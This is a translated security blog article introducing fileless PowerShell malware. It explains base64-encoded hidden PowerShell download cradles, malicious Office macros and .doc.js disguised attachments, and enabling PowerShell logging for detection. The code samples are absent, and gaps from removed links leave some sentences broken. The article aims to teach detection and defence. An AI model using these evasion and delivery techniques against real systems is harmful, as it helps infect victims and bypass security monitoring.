With this article, we begin a series of publications about elusive malware. Hacking programs that leave no trace of an attack, also known as fileless ("incorporeal", invisible, fileless), typically use PowerShell on Windows systems to covertly execute commands to search for and extract valuable content. Detecting hacker activity without malicious files is a difficult task. antiviruses and many other detection systems work on the basis of signature analysis. But the good news is that such software does exist. For example, , capable of detecting malicious activity in file systems.
When I first started learning about cool hackers, , but only the tools and software available on the victim's computer, I had no idea that this would soon become a popular attack method. Security Professionals that this is becoming a trend, and - confirmation of this. Therefore, I decided to make a series of publications on this topic.
The Great and Terrible PowerShell
I have written about some of these ideas before in , but more from a theoretical point of view. Later I came across , where you can find samples of malware "caught" in the wild. I decided to try using this site to find fileless malware samples. And I succeeded. By the way, if you want to go on your own malware-sniffing expedition, you'll have to check with this site to let them know you're doing white hat work. As a blogger who writes about security, I passed it without question. I'm sure you can too.
In addition to the samples themselves, on the site you can see what these programs do. Hybrid analysis runs malware in its own sandbox and monitors system calls, running processes and network activities, and extracts suspicious text strings. For binaries and other executables, i.e. where you can't even look at the actual high-level code, hybrid analysis decides whether the software is malicious or just suspicious based on its runtime activity. And after that, the sample is already evaluated.
In the case of PowerShell and other sample scripts (Visual Basic, JavaScript, etc.), I was able to see the code itself. For example, I came across this PowerShell instance:
You can also run base64 encoded PowerShell to avoid detection. Notice the use of the Noninteractive and Hidden options.
If you've read my obfuscation posts, then you know that the -e option indicates that the content is base64 encoded. By the way, hybrid analysis also helps with this, decoding everything back. If you want to try to decode base64 PowerShell (hereinafter - PS) yourself, you need to run this command:
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))delve deeper
I decoded our PS script using this method, below is the text of the program, though slightly modified by me:
Note that the script was set to 4 September 2017 and was passing session cookies.
I wrote about this style of attack in , in which the base64-encoded script itself loads missing malware from another site, using the WebClient object from the .Net Framework library to do all the hard work.
What does it do?
For security software that scans Windows or firewall event logs, base64 encoding prevents the plain text pattern string "WebClient" from being detected in order to protect against such a web request. And since all the "evil" malware is then downloaded and passed to our PowerShell, this approach thus allows us to completely evade detection. Actually, that's what I thought at first.
It turns out that with Windows PowerShell advanced logging enabled (see my article), you will be able to see the loaded string in the event log. I am like ) I think that Microsoft should enable this level of logging by default. Therefore, with extended logging enabled, we will see in the Windows event log the completed download request from the PS script according to the example that we analyzed above. Therefore, it makes sense to activate it, agree?
Adding more scripts
Hackers cleverly hide a PowerShell attack in Microsoft Office macros written in Visual Basic and other scripting languages. The idea is that the victim receives a message, for example, from a delivery service, with an attached report in .doc format. You open this document, which contains the macro, and it ends up running the malicious PowerShell itself.
Often the Visual Basic script itself is obfuscated so that it freely evades antiviruses and other malware scanners. In the spirit of the above, I decided as an exercise to code the above PowerShell in JavaScript. Below are the results of my work:
Obfuscated JavaScript hiding our PowerShell. Real hackers do it once or twice.
This is another technique I've come across on the web: using Wscript.Shell to run coded PowerShell. Incidentally, JavaScript itself is malware delivery. Many versions of Windows have a built-in , which itself can run JS.
In our case, the malicious JS script is nested as a .doc.js file. Windows will typically only show the first suffix, so it will show up as a Word document to the victim.
The JS icon is only shown in the scroll icon. Not surprisingly, many people will open this attachment thinking it is a Word document.
In my example, I modified the PowerShell above to download the script from my website. The removed PS script just prints "Evil Malware". As you can see, he's not evil at all. Of course, real hackers are interested in gaining access to a laptop or server, say, through a shell command. In the next article, I'll show you how to do this using PowerShell Empire.
I hope that for the first introductory article, we did not dive too deeply into the topic. Now I will let you take a breath, and next time we will start to analyze real examples of attacks using fileless malware without unnecessary introductions and preparation.
Source: habr.com